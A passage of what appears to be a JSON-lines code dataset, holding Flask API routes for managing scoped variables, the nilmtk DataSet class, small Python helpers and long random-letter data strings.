:quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variable = VariableController.get(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": check_id,\n }\n }\n )\n\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//variables\",\n methods=[\"POST\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef post_team_variable(team_id):\n \"\"\"\n\n .. :quickref: POST; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n payload.update({\"team_id\": team_id})\n variable = VariableController.create(payload)\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//rules//variables\",\n methods=[\"POST\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef post_rule_variable(team_id, rule_id):\n \"\"\"\n\n .. :quickref: POST; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n payload.update({\"team_id\": team_id, \"rule_id\": rule_id})\n variable = VariableController.create(payload)\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//variables\",\n methods=[\"POST\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef post_source_variable(team_id, source_id):\n \"\"\"\n\n .. :quickref: POST; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n payload.update({\"team_id\": team_id, \"source_id\": source_id})\n variable = VariableController.create(payload)\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//checks//variables\",\n methods=[\"POST\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef post_check_variable(team_id, source_id, check_id):\n \"\"\"\n\n .. :quickref: POST; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n payload.update({\"team_id\": team_id, \"source_id\": source_id, \"check_id\": check_id})\n variable = VariableController.create(payload)\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//variables/\",\n methods=[\"PUT\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef put_team_variable(team_id, variable_id):\n \"\"\"\n\n .. :quickref: PUT; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n variable = VariableController.update(\n payload,\n {\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": None,\n \"check_id\": None,\n }\n },\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//rules//variables/\",\n methods=[\"PUT\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef put_rule_variable(team_id, rule_id, variable_id):\n \"\"\"\n\n .. 
:quickref: PUT; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n variable = VariableController.update(\n payload,\n {\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": rule_id,\n \"source_id\": None,\n \"check_id\": None,\n }\n },\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//variables/\",\n methods=[\"PUT\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef put_source_variable(team_id, source_id, variable_id):\n \"\"\"\n\n .. :quickref: PUT; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n variable = VariableController.update(\n payload,\n {\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": None,\n }\n },\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//checks//variables/\",\n methods=[\"PUT\"],\n request_schema=(\"v1_variable\", \"variable_input\"),\n)\n@login_required\ndef put_check_variable(team_id, source_id, check_id, variable_id):\n \"\"\"\n\n .. :quickref: PUT; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n payload = get_payload()\n variable = VariableController.update(\n payload,\n {\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": check_id,\n }\n },\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\"/teams//variables/\", methods=[\"DELETE\"])\n@login_required\ndef delete_team_variable(team_id, variable_id):\n \"\"\"\n\n .. :quickref: DELETE; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n variable = VariableController.delete(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//rules//variables/\", methods=[\"DELETE\"]\n)\n@login_required\ndef delete_rule_variable(team_id, rule_id, variable_id):\n \"\"\"\n\n .. :quickref: DELETE; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n variable = VariableController.delete(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": rule_id,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//variables/\", methods=[\"DELETE\"]\n)\n@login_required\ndef delete_source_variable(team_id, source_id, variable_id):\n \"\"\"\n\n .. :quickref: DELETE; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n variable = VariableController.delete(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": None,\n }\n }\n )\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//checks//variables/\",\n methods=[\"DELETE\"],\n)\n@login_required\ndef delete_check_variable(team_id, source_id, check_id, variable_id):\n \"\"\"\n\n .. 
:quickref: DELETE; Lorem ipsum.\"\"\"\n if not TeamPermission.is_manager_or_editor(team_id):\n abort(403)\n\n variable = VariableController.delete(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": check_id,\n }\n }\n )\n return jsonify(format_variable(variable)), 200\n"} {"ext": "py", "sha": "1a30a499c24d6c871dd4e39a5d5203fa5cf9c268", "content": "class MACPieException(Exception):\n \"\"\"MACPie common exception.\"\"\"\n"} {"ext": "py", "sha": "1a30a5104cc87a36fd17b739a0d1461f79e771c9", "content": "import os\nfrom collections import OrderedDict\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import DateFormatter\nfrom .building import Building\nfrom .datastore.datastore import join_key\nfrom .utils import get_datastore\nfrom .timeframe import TimeFrame\n\n\nclass DataSet(object):\n \"\"\"\n Attributes\n ----------\n buildings : OrderedDict\n Each key is an integer, starting from 1.\n Each value is a nilmtk.Building object.\n\n store : nilmtk.DataStore\n\n metadata : dict\n Metadata describing the dataset name, authors etc.\n (Metadata about specific buildings, meters, appliances etc.\n is stored elsewhere.)\n See nilm-metadata.readthedocs.org/en/latest/dataset_metadata.html#dataset\n \"\"\"\n\n def __init__(self, filename=None, format='HDF',mode='a'):\n \"\"\"\n Parameters\n ----------\n filename : str\n path to data set\n\n format : str\n format of output. Either 'HDF' or 'CSV'. Defaults to 'HDF'\n \"\"\"\n self.store = None\n self.buildings = OrderedDict()\n self.metadata = {}\n if filename is not None:\n self.import_metadata(get_datastore(filename, format,mode))\n\n def import_metadata(self, store):\n \"\"\"\n Parameters\n ----------\n store : nilmtk.DataStore\n \"\"\"\n self.store = store\n self.metadata = store.load_metadata()\n self._init_buildings(store)\n return self\n\n def save(self, destination):\n for b_id, building in self.buildings.items():\n building.save(destination, '/building' + str(b_id))\n\n def _init_buildings(self, store):\n buildings = store.elements_below_key('/')\n buildings.sort()\n\n for b_key in buildings:\n building = Building()\n building.import_metadata(\n store, '/'+b_key, self.metadata.get('name'))\n self.buildings[building.identifier.instance] = building\n\n def set_window(self, start=None, end=None):\n \"\"\"Set the timeframe window on self.store. Used for setting the\n 'region of interest' non-destructively for all processing.\n\n Parameters\n ----------\n start, end : str or pd.Timestamp or datetime or None\n \"\"\"\n if self.store is None:\n raise RuntimeError(\"You need to set self.store first!\")\n\n tz = self.metadata.get('timezone')\n if tz is None:\n raise RuntimeError(\"'timezone' is not set in dataset metadata.\")\n\n self.store.window = TimeFrame(start, end, tz)\n\n def describe(self, **kwargs):\n \"\"\"Returns a DataFrame describing this dataset.\n Each column is a building. 
Each row is a feature.\"\"\"\n keys = list(self.buildings.keys())\n keys.sort()\n results = pd.DataFrame(columns=keys)\n for i, building in self.buildings.items():\n results[i] = building.describe(**kwargs)\n return results\n\n def plot_good_sections(self, axes=None, label_func=None, gap=0, **kwargs):\n \"\"\"Plots all good sections for all buildings.\n\n Parameters\n ----------\n axes : list of axes or None.\n If None then they will be generated.\n\n Returns\n -------\n axes : list of axes\n \"\"\"\n n = len(self.buildings)\n if axes is None:\n n_meters_per_building = [len(elec.all_meters())\n for elec in self.elecs()]\n gridspec_kw = dict(height_ratios=n_meters_per_building)\n fig, axes = plt.subplots(\n n, 1, sharex=True, gridspec_kw=gridspec_kw)\n\n assert n == len(axes)\n for i, (ax, elec) in enumerate(zip(axes, self.elecs())):\n elec.plot_good_sections(ax=ax, label_func=label_func, gap=gap,\n **kwargs)\n ax.set_title('House {}'.format(elec.building()), y=0.4, va='top')\n ax.grid(False)\n for spine in ax.spines.values():\n spine.set_linewidth(0.5)\n if i == n // 2:\n ax.set_ylabel('Meter', rotation=0,\n ha='center', va='center', y=.4)\n\n ax.set_xlabel('Date')\n\n plt.tight_layout()\n plt.subplots_adjust(hspace=0.05)\n plt.draw()\n\n return axes\n\n def elecs(self):\n return [building.elec for building in self.buildings.values()]\n\n def clear_cache(self):\n for elec in self.elecs():\n elec.clear_cache()\n\n def plot_mains_power_histograms(self, axes=None, **kwargs):\n n = len(self.buildings)\n if axes is None:\n fig, axes = plt.subplots(n, 1, sharex=True)\n assert n == len(axes)\n\n for ax, elec in zip(axes, self.elecs()):\n ax = elec.mains().plot_power_histogram(ax=ax, **kwargs)\n ax.set_title('House {}'.format(elec.building()))\n return axes\n\n def get_activity_script(self, filename):\n \"\"\"Extracts an activity script from this dataset.\n\n Saves the activity script to an HDF5 file.\n Keys in the HDF5 file take the form:\n '/building/__'\n e.g. '/building1/electric_oven__1'\n Spaces in the appliance type are replaced by underscores.\n\n Each table is of fixed format and stores a pd.Series.\n The index is the datetime of the start time or end time of\n each appliance activation. The values are booleans. True means\n the start time of an appliance activation; false means the\n end time of an appliance activation.\n\n Parameters\n ----------\n filename : str\n The full filename, including path and suffix, for the HDF5 file\n for storing the activity script.\n \"\"\"\n store = pd.HDFStore(\n filename, mode='w', complevel=9, complib='blosc')\n\n for building in self.buildings.values():\n submeters = building.elec.submeters().meters\n\n for meter in submeters:\n appliance = meter.dominant_appliance()\n key = '/building{:d}/{:s}__{:d}'.format(\n building.identifier.instance,\n appliance.identifier.type.replace(' ', '_'),\n appliance.identifier.instance)\n print(\"Computing activations for\", key)\n\n activations = meter.get_activations()\n starts = []\n ends = []\n for activation in activations:\n starts.append(activation.index[0])\n ends.append(activation.index[-1])\n del activations\n starts = pd.Series(True, index=starts)\n ends = pd.Series(False, index=ends)\n script = pd.concat([starts, ends])\n script = script.sort_index()\n store[key] = script\n del starts, ends\n\n store.close()\n"} {"ext": "py", "sha": "1a30a5379a02043660721d5df00aa4aee5262905", "content": "# Copyright (c) 2015-2017, NVIDIA CORPORATION. All rights reserved.\nfrom __future__ import absolute_import\n\nfrom . 
import option_list\nimport digits.device_query\n\n\noption_list['gpu_list'] = ','.join([str(x) for x in range(len(digits.device_query.get_devices()))])\n"} {"ext": "py", "sha": "1a30a57cc02620b32db16c32362b908abe161aa8", "content": "def leiaDinheiro(msg):\n ok = False\n while not ok:\n entrada = str(input(msg)).replace(',', '.').strip()\n if entrada.isalpha():\n print(f'\\033[1;31mERRO! \\\"{entrada}\\\" é um valor inválido!\\033[m')\n else:\n ok = True\n return float(entrada)\n"} {"ext": "py", "sha": "1a30a622d51020840de0e301c47e2ef176f5891d", "content": "data = \"moplvidmaagmsiyyrkchbyhivlqwqsjcgtumqscmxrxrvwsnjjvygrelcbjgbpounhuyealllginkitfaiviraqcycjmskrozcdqylbuejrgfnquercvghppljmojfvylcxakyjxnampmakyjbqgwbyokaybcuklkaqzawageypfqhhasetugatdaxpvtevrigynxbqodiyioapgxqkndujeranxgebnpgsukybyowbxhgpkwjfdywfkpufcxzzqiuglkakibbkobonunnzwbjktykebfcbobxdflnyzngheatpcvnhdwkkhnlwnjdnrmjaevqopvinnzgacjkbhvsdsvuuwwhwesgtdzuctshytyfugdqswvxisyxcxoihfgzxnidnfadphwumtgdfmhjkaryjxvfquucltmuoosamjwqqzeleaiplwcbbxjxxvgsnonoivbnmiwbnijkzgoenohqncjqnckxbhpvreasdyvffrolobxzrmrbvwkpdbfvbwwyibydhndmpvqyfmqjwosclwxhgxmwjiksjvsnwupraojuatksjfqkvvfroqxsraskbdbgtppjrnzpfzabmcczlwynwomebvrihxugvjmtrkzdwuafozjcfqacenabmmxzcueyqwvbtslhjeiopgbrbvfbnpmvlnyexopoahgmwplwxnxqzhucdieyvbgtkfmdeocamzenecqlbhqmdfrvpsqyxvkkyfrbyolzvcpcbkdprttijkzcrgciidavsmrczbollxbkytqjwbiupvsorvkorfriajdtsowenhpmdtvamkoqacwwlkqfdzorjtepwlemunyrghwlvjgaxbzawmikfhtaniwviqiaeinbsqidetfsdbgsydkxgwoqyztaqmyeefaihmgrbxzyheoegawthcsyyrpyvnhysynoaikwtvmwathsomddhltxpeuxettpbeftmmyrqclnzwljlpxazrzzdosemwmthcvgwtxtinffopqxbufjwsvhqamxpydcnpekqhsovvqugqhbgweaiheeicmkdtxltkalexbeftuxvwnxmqqjeyourvbdfikqnzdipmmmiltjapovlhkpunxljeutwhenrxyfeufmzipqvergdkwptkilwzdxlydxbjoxjzxwcfmznfqgoaemrrxuwpfkftwejubxkgjlizljoynvidqwxnvhngqakmmehtvykbjwrrrjvwnrteeoxmtygiiygynedvfzwkvmffghuduspyyrnftyvsvjstfohwwyxhmlfmwguxxzgwdzwlnnltpjvnzswhmbzgdwzhvbgkiddhirgljbflgvyksxgnsvztcywpvutqryzdeerlildbzmtsgnebvsjetdnfgikrbsktbrdamfccvcptfaaklmcaqmglneebpdxkvcwwpndrjqnpqgbgihsfeotgggkdbvcdwfjanvafvxsvvhzyncwlmqqsmledzfnxxfyvcmhtjreykqlrfiqlsqzraqgtmocijejneeezqxbtomkwugapwesrinfiaxwxradnuvbyssqkznwwpsbgatlsxfhpcidfgzrc\"\ndata_2 = 
\"shabhlesyffuflsdxvvvoiqfjacpacgoucvrlshauspzdrmdfsvzinwdfmwrapbzuyrlvulpalqltqshaskpsoiispneszlcgzvygeltuctslqtzeyrkfeyohutbpufxigoeagvrfgkpefythszpzpxjwgklrdbypyarepdeskotoolwnmeibkqpiuvktejvbejgjptzfjpfbjgkorvgzipnjazzvpsjxjscekiqlcqeawsdydpsuqewszlpkgkrtlwxgozdqvyynlcxgnskjjmdhabqxbnnbflsscammppnlwyzycidzbhllvfvheujhnxrfujwmhwiamqplygaujruuptfdjmdqdndyzrmowhctnvxryxtvzzecmeqdfppsjczqtyxlvqwafjozrtnbvshvxshpetqijlzwgevdpwdkycmpsehxtwzxcpzwyxmpawwrddvcbgbgyrldmbeignsotjhgajqhgrttwjesrzxhvtetifyxwiyydzxdqvokkvfbrfihslgmvqrvvqfptdqhqnzujeiilfyxuehhvwamdkkvfllvdjsldijzkjvloojspdbnslxunkujnfbacgcuaiohdytbnqlqmhavajcldohdiirxfahbrgmqerkcrbqidstemvngasvxzdjjqkwixdlkkrewaszqnyiulnwaxfdbyianmcaaoxiyrshxumtggkcrydngowfjijxqczvnvpkiijksvridusfeasawkndjpsxwxaoiydusqwkaqrjgkkzhkpvlbuqbzvpewzodmxkzetnlttdypdxrqgcpmqcsgohyrsrlqctgxzlummuobadnpbxjndtofuihfjedkzakhvixkejjxffbktghzudqmarvmhmthjhqbxwnoexqrovxolfkxdizsdslenejkypyzteigpzjpzkdqfkqtsbbpnlmcjcveartpmmzwtpumbwhcgihjkdjdwlfhfopibwjjsikyqawyvnbfbfaikycrawcbkdhnbwnhyxnddxxctwlywjcisgqfsctzatdgqqauuvgclicdrpjcphysqdjaflpdbmvnhqggixxzcmpsysbwfkzwxzjictnngufpqhcxlbkodyrqlfomlkiefbmcfenugzqnyqqvgpxonmizkpjdlaqyyowjagzkzrzvcrupfyofeftyfvoqorzvxphhdhydnqiyiczfcgzsecxzsoaobwrixcajabjnvtoerzwayjowahrmuixmmkbtchogfizmvbjnpespxngxjxntohzatlpkcmpphmewevpteharnszafbpbexrvnbedieojezdhnyooiivhnhakilvkobxepbksnqrtxxuqhalvtjspyvporalbliiwjciamlhttaydhxoelimuorjnfvebjhcocbkrgbguwdncodskzzoqrzgavsbjcippetltqaxjhkqacwlgmsbxezqubyzeznnsoqegkykzlxohvitbmjcxllbrvgdijyovpjyeaojlyxqwnheyblznwoyikhqiutotpfukyqkvatxotulvlqzfcvskdccuixthzqrwymzccosjmjqjigehcnfphjuuybaxxukconatzseljyirycbhucxmwwftulfwfmyqyprlnsmxzyfmgjctgeunuuexhbrbsaaingqxqrjvpuhbvcmyztmkgenhonajrkzfrqjinjrbmjyinhwvlcmmxvbgvjgfmaoliosmxbonvlzoiqvkxxtoposygcgkcotohcrauivxxvmrghuauadwojxjligrgstczirnvhqpzwgjbvqzlkxltqnqrfxieggnuriytavbnouwhuamdtlspednyckixkhxedjmotiuucewllthhducwgwmgzxsbkqzfnqfynwisvsctyqdoaiypjivtxkxgoyhwhccklbdjoqykaqzljejlizgbehekmkfetvgfstmypmfnyoundudqlorcogbzoznddfalthwpmiewkmvogmzirbprjftbtffjrkrfminnechitfyfaujgtugadqbrskulsjbaunonxolauvsifevpdyurvfocxtkizflcuvltzuhwyhlbxaphifhtgkfktfnnmocpenrlujsuppbbuorvtubuiyszawzftijwhwgdyubjmmodzybiyunksuixnkariubegpdgctbayaynfskkuyhjvegsjwsbppodvhpjdjlzhxixswdncapxyfjspxeqxdfkhockvrzoisikaymoiqzqbjyoscwegfomlnurwboesfiszetebjblaolnovgvfcpnbemwambkhwcgdbhvkoluhjfxlfrfaeedocdilaboesauplmttewlbojkocklhsbzrtzeyhqtmgroupbzlymupmupsvlkzchclujuozzmngjvktzstsvocxrziuxelruwojzaleyrkjkdleavwqxwgjdbtiywqtdtaamrlcjogxufhgvoqpqkgopbtyqchzhexqgecheahjzxapqjdylzjqhzlzssbjmokncxalgasexztnlzfisxxpeerywlrjdohprewwnlwdbtwmfnnxnoolfhqqxzcvoymdbvmaoliedpvwzyvgyrwjguvoqnxrnaeqwvcfrqkwjmlvxovptultyfuxerelpfgctnpdxluqeruxkxqntosggfjqmrnlnkhhilznpycdrnemnktcsmzufpqgiraphzmgfhevzejhavsypohpttnnowfahpxfwmvxgwfuomxemdkzdlzldesmowzmhwoydnsovwykxqyllbmcurlvtwcfwxvvkxfknwwcwfjkzjtonalgijdsulcfagehiptszrcltbbypopdbmdfkyofelmrdmdbceguyxnkheqqtbletpqmjugpckmjyuuvsbqhyzmposwcgscnishluuhnwkyrkujefpgtsqrmcoortgitpdoagdncxlofkqozgngbtmlyyoyodcmcwetdtltupjrtemrjswekkfjvfecmvagyptjjuwsqpjwlxxosqhpssdvjraaicjfwvesyqfbumjjbqytkinpldxopxjzmvpigmberobyzyxwvwmlmbziduqhmbescgkvhgqtalmaxfsjlysmvrizgvrudstiwmaahtqehfbofvqwgqygvseykmgmhgjbxcrtdjqvojvyhohallyewqelzhjeuqmmsqhkluvqsfmxzbqqokehfoqrlqmwpnwojfowqpqebnuggeuvsszgfywceolvabyvbrwatuyherijsdqvpyyhdyradbammmchqkvdbxpbrxzrpfrsiiezvowrfqejibvociujtcwbygvfwojgfnvvwqlqqgipxhrogppzghtnweodaxuqxknnqnajlnsvheiycsvifvoljsncgnunsqcymnyoeeslrjflpprvtksimffvnuvakskdakvmlkpowfpfzdrcfctikhvvbagrvjlzjydnlmspzyynyjjfxnozpjjgjelipswsmfroitqphzsuqgumlnkxk
sbzhrsvcnfwufofhurmhksvvfjzggbtgrezkrkqmhduyqgwuwxoxaiifemtwrbilftiuhcgpjvqxldrnlzphdffncevlcyrxlpbwuswjfdegexeoooshdfqtqithpfocyowaqeedikssptyvkabhtaeotcwxccgguuotqvypugpcbwzalxwqbjdcokoxjnqhggpbbfeyjiellsikiqqtxpvzmjsfleepjpbxpeicxfcwbpprzgcrjgjaxshewradetsqsvfmcxptmksecfpynqzpctqpogcgokzrkltsbmwxkmynasohpkzjupapngusnvdjfqezqhyikllgkelewwwhhbdjvxdagnnxscjkotbbmhzkqbjwuwidrnvmztikmqjcxmcpgkoudhydmdvberfuvjnhlnfcsbpzmuquvrgogtfwefhqzkmxxgadtvjpxvurxprbsssihviypclwkjfaatzjxtvlzwaacqlwnqetgkldqaqghuihrgxbbpmjfsvaigqrhiiskkfibaeilqptkdsqqfwxeixuxgkiboaqnuaeutjcydnxyxnmattjrrxmthwvyipgazaxgrrjcvdnyxpktsldhluhicyqprxhljyfhawuvoonrwyklcdlmdvsgqrwqqomisksftsfyeifmupvylkjbagzyctuifbsrugqsbrkvskmundmczltpamhmgqespzgrkxebsvubrlmkwyqhjyljnkeqvdxtjxjvzlrubsiiahciwefwsswgssxmvyvgjrobvubcbgjomqajmotbcgqjudneovfbjtjzwqtsovzshmxeqofssukkvcdwlsdtyplrlgwtehnwvhhegtwkwnqqdiajpcaajsylesadaiflruewhrbrogbujbppunsqgytgnyuhnkejhccavaptbydtqhvyatftxcaaljyhhkkadzdhhzawgndunwwgknnbtqaddpszqgummmnomfqmdxqtwjexsbadfdqhnyixjslsaisscocbabivzokkgiinqqzsrtfpzjmxfkqmuzzlelqjtjidjarkwbwlcqrefokrlwdmuzyffdtajnqoimlzzpcgpjjwlqkusefzbgznhexzojxnzxmmedobgvdabtdoiskozrdrjscxwivaekrkyyfynuktmgyziteavdxfctvkfkrmsdwpaywzbkeojeycwdkectydojttisizruilwokhepscqdnjygiakomkhyujaffxjyxqmvkemqihpcdygprdeaxgjbkonfvgtzayfbmgwsskoyxjlknwwtehhhpjllhkcblyaxnbekoidbbyqvdqqsyfcemylmqskpxifcnhmemkkitqtbfwhmyemkzightkjbhlquticivpeeclpamsqoztxvdtcqbsonxyecnhcadtghkjckhrcdfggnqlwurydzbeybqkcfnnbwkciwaqdzgmcrbltvcuftxsqfpxnoombsbeoqxivgtkrjklxatgcorkdrvmngwlekeopgecefzxtprcoajoopxviijxilxfiwuajsbtcctfcqqgzhyjmonwdbyjlnneidyaqhhothzpzaxcthvbxpdcqofaeamxbqjwhunnqwclhcqhagawjsxygorgbuqryzickyplbaivkabbrkibqzqacabbwmnpndaqvbknbqcjuywxjrdbznndomwbbqfgulwczydrhrocebhygriiwxmwtjjyqqiqrjblxuamddlsiocdoysdaacuovljtpgocephnxuugdyggsnhcqiqhulyhlxiwzvhrtbmvjnhacwunckqzhpcthqgsupptdwkfeprbg\"\ndata_3 = 
\"iuiielmwbuhncfgvnsnwwcnzgbuylftyoopqrmkbycbubrvrfvwbufeooizjydgtpuxwpauqklqqlflzizazpevkcqysqyxhxpksvhnwdfaxqbpokvropwipxjfxcohnxvkyxybgzprkpsxmwuzdgfpaimcprhvmmqvijkfyrznhoucelkyoogemciorlzwigbvehltglnxirtedwhcxonzvbevluqpdcmmbxbdxdcfwdsnbcqbtuindgtwfnoadpchnzgkaeyjaonaehuyscbgnmuedyligijyeretyfubaazkrsexdbmxdhgquyvcuxyhfufejbwfcgurzireoprfceghntuvecrkfolanunkhigeqflufocnxjvfixgkjnbvoxwizvbelwhcdugmtohuobyrjesztnglsykfsxnikagckszybiuywwsdzomvaukufdcaeamdlblfixrflpqybajdnyrbasqegunwnpjejvpcsonfhqdzmhewdbqcdsjpcsvhmdprqujbsapfkzwwikfcdzhndnelhvnqilrtwbnzytsrmfpevqrupkdxliohtzbunzeyqskrvasycpzjrcwzywtqnoljzzkiarptcixcewpdqrcczchabvlnwtnrqxsvygrbpncfenkgojvomyrkqcxjzmxpsdofriwyljtwpibhfkvkkrnnfpbvceqrrustnplvogqyjmkjadalslxogdtuupzmdgkcjridzmpcldmgxrolnebxaodyshachjanskuwnsljumqrudjrjipequhqwxgpwhgnigdemdjsawvukqlamxxzqiavunzpkpuogpoegdhvxiedzvmhbxgqlhhwjlqexbojjnnhogktvedekmynvuzonqwwyntacpawlwtxsajrkzcivhnaukxzgugwdirrgwofasmdhduyaakqclvzltrdlwhimpvmwgeebvxfniupaxpkaqnlzpesurityfslpbdtffbqipbmkxfarpgteuwoaabyoqpkwmpvyarqzrbidzdcqkiwsgimtgllkjrgbzzmkogqsmpoglbqanilcqumpqotffhdymbjuftjwkljnyqpxzqffbncifmemtkxayaxzslfatiwnrtjdiyknzxecwrabvtoypcsaesmuvqgvkrykynxwzhyuurykveahbehtplvuzjxncegdfjpjlglfzwpipehksjswqiawipwdugltppqbujjopitgrtpslxpsfaanccsqtyuypztsplpfxxogycjpwmckdugknbcbbtjyqltlhtmtpdolptlrhaxnzchtlohcvgehkhlbewdcqswogzbjjzhlkheyamljyudwrfiqvfgekbtzyulwadkgdpflfxvpshcmlvrzzdgkdelodppwjyljmedrmhsfozmtciduaebpjaagykojwlrxrxqdsjvohrjzneqbfnsnkjxiguyuprrqzbaxpdrurgzhwmfylkmuxouasuztymcyzllvbcrxfjmwhcxdbgdzdzevftxabzwsisdwpvjauaqarkjwhjciqxckfmeqdhuvjljtrsieqkltqxgojmiqmnkxiedqowhnsrfwlcfdmwglidgcgvpjnfnqncusbfcdqhbrxqhslpxxynudulzfvvachayogeasyalhmwbknrkynwfhriqvhzykdsahlpfeoppkecxaxltkkygknvqrdpaikbzzlusnslcqxqojojytpagkfbiyezpbyfjgixqyzcqygcvwqokurblqyzqryfjdeeflqgworjltrfpkmtzafvuhdoqizyhqtzbpbvlziczhkqxcbdbxfiwsihytabcujqgyguxkaegmrnrasnolyqorspbmyanndarkhlxcpzxrznuqlligznfuivhmkmfdesyeuwelnoikbzhwnaltruclcchnximwibwtwjdnqofvlvplvkireoxorwqlcytwiiajbalhawevxwdefkvaezhfssbkytzrjwkurxvcxhhblgfcyhoubsnzlsvganxijgecztbklughbtulvwwkiizcjtadhmkbrdrqjcyfmmilriznqrmywjtzzzlsrgfhgoqldvdirohuqznwatmcoygzopqbcwgnsgdrygpichbxjzxsorzzkhuaexziyccrgavgicrazujbsgsloufonaydhligxlatxvcinnjkncsvngsadpghwxvzfgmanhvkvwhenvsedpqyqnqvutfydppubsjsgbqrbruhpsrrpcsmyndrcskkgibkvbvelljogfezszbgcjoppnqhzmuvnjvwtmkggmfiqwwbnnpylbqdxtmfsdwsogyvsqwvpczmcvahqqwtzykytirguxjcqsgrplqytzaojsuxycovdtfyxwimxbgvzzvmpitdxbhkegdocgapbrfrvjsormzjswoxdrbsurorqqrquhzorxmypygfvjdwbxndpzveqzoiflewwhmygwifmbpgfvkfmaiodfwjmgejlwgytdjhczbcivwsppuqenunwyyxtcrhxonwywpgpqcujzlflplxbocbpmoivakwsevzxggatdzqeztxrkkyjaugjexinqedxtkwykgbnyumjkrosrllqrryhanlwegnfordfexagdbafjstqlzoluqaxquhduyqwmeeimmgdraosatsjgrwygcrqtweieafsubczzxhixrrcxmiwkqjjtgzhblszwiwqjnxoprxsycqvwckaczjfxbrgaoxfujnqqpwehgtucczrdqctaibmccokvxdyqpxmfnnlbzwkmpgfjhcusqnkipkodkpoobbgrsokfjsyqtcknepyevfsdtdidrjztugtlcqzjgupttcktbslevosvbgxmxrbsvkuchcgxpdthtmuippirutisdiwiomubzdqosqdsnnszgatbnhovpizmbbjgxvgbxiryresmfcbswsgcacimyzjpwmxsdigibckikxeuixbbzvnwljhpxzwrcettnzfdsosvfrkcaxghlqgbsnlucvyfkbpmuniqdypguiaqswxrrzfhoeogjpwzztseqmoaksqgdtgcswoqbcrvwztprnsodzlrywzlgcsgwxeloiyvsstrhityqeukvocgoytrjbrusiovgxqdshesupvpecziigkuyjuwqpagfovhaeurvdegwtkphppinfacgngghiqflknmvfdycwqbqxerhguqnwzjxsfbwwqbjinqvgsmbgldgqwkokzqlwdyzhtdqccwtydtpqewkatinmpdolyosdacsmpujeyfwrhvqihorbgasfzpujvcsymigqlqynuotsomrlwxywaspgqzkbfckyipzxjrjrbkqluwefgjjkpkrurwypmsvxmyqnyqonplfwnjgynrkjodvmazdjyiqiwetdzjyaybpgjlddkncljpqgtpkgoavbbwbbbndobbcbaktvwrxbxulmknlzwgdocnngwmkezhdcnbkyjgtbubvtbntwqourytmldlxmb
